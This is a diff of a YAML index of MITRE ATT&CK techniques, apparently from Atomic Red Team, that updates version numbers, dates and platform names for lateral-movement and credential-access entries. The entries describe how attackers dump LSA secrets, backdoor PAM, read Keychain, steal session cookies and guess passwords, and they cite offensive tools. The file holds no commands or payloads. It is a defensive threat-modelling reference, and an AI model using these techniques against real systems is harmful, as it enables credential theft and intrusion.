         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42897,7 +43573,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -42930,7 +43606,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -42969,7 +43644,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -43003,12 +43678,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43036,10 +43709,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -43069,7 +43741,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -43131,12 +43802,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43160,11 +43830,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -43189,9 +43858,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -43251,7 +43919,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -43306,7 +43973,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -43374,12 +44040,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -43436,6 +44101,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43446,13 +44112,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -43511,7 +44176,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43605,49 +44269,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43662,20 +44287,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43755,12 +44417,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43789,6 +44450,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43800,18 +44462,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43838,14 +44500,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43969,12 +44628,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43989,10 +44647,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -44000,14 +44659,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -44050,14 +44709,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -44112,14 +44768,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44170,14 +44825,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44211,8 +44865,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -44229,11 +44883,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -44251,7 +44904,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -44268,10 +44921,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -44295,46 +44948,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -44355,65 +44974,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44422,6 +45038,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44429,31 +45048,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
